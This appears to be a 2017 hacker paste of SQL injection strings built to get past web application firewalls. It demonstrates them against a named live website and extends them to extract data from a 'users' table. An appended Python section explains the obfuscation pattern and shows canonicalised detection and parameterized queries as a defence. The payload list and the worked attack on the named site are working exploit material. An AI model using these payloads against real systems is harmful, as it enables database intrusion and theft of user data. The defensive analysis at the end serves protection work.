AZZATSSINS_CYBERSERK

Bypass WAF SQLi (HOT 2017)

Sep 9th, 2017
The Methods

id=1.unioN/**/distinct%20%73eleCt""a
id=1%.0unioN/**/distinct%20%73eleCt+-!~
id=1%""unioN/**/distinct%20%73eleCt@$%
id=1%''unioN/**/distinct%20%73eleCt@%C0%
id=1-.0unioN/**/distinct%20%73eleCt@%C0/
id=1=\NunioN/**/distinct%20%73eleCt@%FF|
id=1<0.unioN/**/distinct%20%73eleCt@=
id=1>0.unioN/**/distinct%20%73eleCt~.
id=1e0unioN/**/distinct%20%73eleCt""$
id=1^0.unioN/**/distinct%20%73eleCt!~
id=1|""unioN/**/distinct%20%73eleCt\N$
id=1|''unioN/**/distinct%20%73eleCt\N%FF
id=1|.0unioN/**/distinct%20%73eleCt!@
id=1|\NunioN/**/distinct%20%73eleCt""/

How it Works

http://www.atrium.com.pk/Map.php?ID=4 ' and 0 union select 1,2,3,4,5,6,7,8-- -

WAF >>> Internal Server Error

http://www.atrium.com.pk/Map.php?ID=4 ' and 0.unioN/**/distinct%20%73eleCt""a1,2,3,4,5,6,7,8-- -

More >>>>

id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -
id=1-.0unioN/**/distinct %73eleCt@%C0/a1,2,3.1from users-- -
id=1=\NunioN/**/distinct %73eleCt@%FF|a1,2,3""from users-- -
id=1<0.unioN/**/distinct %73eleCt@=a1,2,3''from users-- -
id=1>0.unioN/**/distinct %73eleCt~.a1,2,3 from users-- -
id=1e0unioN/**/distinct %73eleCt""$a1,2,3 from users-- -
id=1^0.unioN/**/distinct %73eleCt!~a1,2,3 from users-- -
id=1|""unioN/**/distinct %73eleCt\N$a1,2,3 from users-- -
id=1|''unioN/**/distinct %73eleCt\N%FFa1,2,3 from users-- -
id=1|.0unioN/**/distinct %73eleCt!@a1,2,3 from users-- -
id=1|\NunioN/**/distinct %73eleCt""/a1,2,3 from users-- -

thx for:
http://fb.me/Melegy.GHI
http://fb.me/programer.shtml
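
Seen from the filtering side, the strings above share one shape: mixed case, a /**/ comment in place of a space, a percent-encoded letter (%73 for "s"), DISTINCT placed between the two keywords, and the keyword glued to a numeric prefix. The Python sketch below is an added example, not part of the original paste; it canonicalises a parameter value before matching and compares the result with a raw-value rule. NAIVE_RULE, the function names and the two benign samples are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# A rule of the kind these strings get past: it is applied to the raw value
# and expects whitespace-delimited, directly adjacent keywords.
NAIVE_RULE = re.compile(r"\bunion\s+select\b", re.I)

# Applied after canonicalisation. No \b before "union": the strings glue the
# keyword to a numeric prefix (1.union, 1e0union), where no word boundary
# exists. ALL/DISTINCT between the two keywords is optional.
UNION_SELECT = re.compile(r"union\s*(?:all|distinct)?\s*select")
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Undo the encodings the strings rely on before any rule is matched."""
    for _ in range(max_rounds):  # repeated so nested percent-encoding is undone
        decoded = unquote(value.replace("+", " "))
        if decoded == value:
            break
        value = decoded
    value = INLINE_COMMENT.sub(" ", value)  # /**/ stands in for whitespace
    return re.sub(r"\s+", " ", value).lower()


def naive_hit(value: str) -> bool:
    return NAIVE_RULE.search(value) is not None


def canonical_hit(value: str) -> bool:
    return UNION_SELECT.search(canonicalize(value)) is not None


# Parameter values copied from the paste, plus two constructed benign values.
SAMPLES = [
    "4 ' and 0 union select 1,2,3,4,5,6,7,8-- -",
    '1.unioN/**/distinct%20%73eleCt""a1,2,3',
    "1e0unioN/**/distinct %73eleCt\"\"$a1,2,3 from users-- -",
    "1|\\NunioN/**/distinct %73eleCt\"\"/a1,2,3 from users-- -",
    "4",                      # constructed: normal numeric id
    "trade-union-history",    # constructed: benign text containing "union"
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"naive={naive_hit(s)!s:5} canonical={canonical_hit(s)!s:5} {s}")
```

Canonical matching is still a blocklist and can flag benign text that happens to contain both keywords; for a numeric id parameter the durable fix is integer validation and a parameterized query, which makes every string in this paste inert.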